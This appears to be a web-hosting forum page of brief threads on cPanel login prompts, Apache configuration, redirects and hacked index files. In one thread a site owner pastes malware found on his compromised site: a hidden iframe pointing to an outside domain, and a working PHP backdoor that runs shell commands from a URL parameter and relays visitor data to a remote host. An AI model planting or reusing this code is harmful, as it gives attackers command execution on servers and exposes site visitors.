CPanel Prompts Login On Websites Index
Jan 25, 2008
I'm having an issue on my buddies website. He keeps getting this weird login prompt whenever you view his website. I thought it was just for his site itself but then I remembered e107 never has a pop up prompt to ask you to log in. I looked closely and realize it said its for the cPanel. So whenever you try to view the index page of his site it asks you for your user name and password. Very odd... Anyone know what could be causing this.?
View 2 Replies
ADVERTISEMENT
Jun 9, 2007
how to best secure logins and password storage, I'm trying to come up with a set of tools to make this easier, but first I'd like to hear opinions if my ideas are feasible, and most importantly secure.
Most scripts (including very popular ones like phpBB) send the password & username over http and then perform an MD5 hash on the sent password on the server and compares it to the hash stored in the database.
I'm thinking this is really quite insecure for more then a few reasons.
1) The password could easily be sniffed since it's sent in plain-text
2) MD5 is a pretty weak hashing algorithms with plenty of exposed vulnerabilities
3) If a hacker was to get their hands on the database, they could just brute force (birthday, rainbow tables, etc) the passwords and get the passwords to a large group of users in a fairly limited time since people are horrible with their passwords
I'm thinking a secure alternative could be something like...
1) Combine the password and username client side (via js) and send the username over plain text, but instead of the password send a hash (preferably with a strong algorithm like SHA256) to the server.
-- This would increase the work of a hacker that managed to sniff out the connection right? This shouldn't be a major drain on bandwidth (SHA256 JS Code < 3.5 Kbs) and the length of the hash shouldn't cause any major additional load, right?
-- Obviously HTTPS would be a much better solution, but that's quite a bit harder to implement.
2) The server should then perform plenty of operations on the hash sent by the password, the most important of which would be salting the hash and rehashing the result.
-- This would make it nearly impossible to use rainbow tables, and a hacker would have to separately brute force each users password?
Okay, the set of tools for developers I've mentioned early in this post is available at [url], I'd like some opinions on whether this is even a good idea, and if I'm doing anything (or nothing ) right. I'm going to be making additions to common applications to help increase the level of security in the passwords department.
View 7 Replies
View Related
Sep 8, 2007
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
View 5 Replies
View Related
Jun 23, 2008
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
View 1 Replies
View Related
Mar 6, 2007
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
View 3 Replies
View Related
Jan 31, 2008
Just got a new additional VPS with WHM/cPanel.
Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!
The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.
View 3 Replies
View Related
Sep 30, 2009
how to display the time and date of a file that was added to an Apache file directory on a cPanel server?
It used display the time and date back in the 1.3 and 2.0 days, but it doesn't on the 2.2 versions of Apache.
View 2 Replies
View Related
Oct 26, 2008
I have subdomain, the index file was hacked
Who know how to protect the Index files with cpanel
View 8 Replies
View Related
Jan 8, 2008
I am using a new redhat box with WHM (cPanel) and was wondering why all of my indexes have a footer suchs as this on them:
Apache/2.0.61 (Unix) mod_ssl/2.0.61 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 Server at www.domain.com Port 80
View 5 Replies
View Related
Mar 27, 2007
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
Is it something wrong with httpd.conf or what?
View 6 Replies
View Related
Oct 16, 2007
I'm trying to get setup with Apache 2.2, and did just fine on one server but the second one is giving me some troubles. I'm having an issue with some sites wanting to download instead of display. Does this ring any bells with anyone right off?
httpd.conf appears to be okay as far as I can see, but obviously something is not quite right somewhere.
View 5 Replies
View Related
Nov 14, 2008
i have a problem with my box .. after i reboot the server the login to whm or cpanel didn't work ... everytime i must use this command
/etc/rc.d/init.d/iptables stop
then the logins work successfully
so .. what's the problem with the iptables with me?
View 6 Replies
View Related
Apr 23, 2008
I have someone on my server that is having problems login to Cpanel and WHM.
They can view all websites on the server even theirs, but they cannot login.
They keep getting: Firefox cannot establish a connection with the server.
Even in IE they get a error message.
They even tried with "theirdomain.com/cpanel" and got the same thing.
They are using a rounter also, so I told them to try unhooking that, but my main question is, it doesn't seem that their IP is blocked as I checked, so is there anything else on the server that could cause this or is it something on their end?
View 8 Replies
View Related
Mar 1, 2008
I've unmanaged server, everything running well
but I can't login into cpanel/whm I tried :
>myip:2086
>myip:2087
>myip:2082
>myip:2083
when I try to login the [The connection was reset]Firefox msg.
I can login through ssh,and i tried to restart cpanel service and I update it...
View 11 Replies
View Related
Nov 6, 2009
i worrying about WHM/CPanel login without SSL, it possible to install SSL?
View 5 Replies
View Related
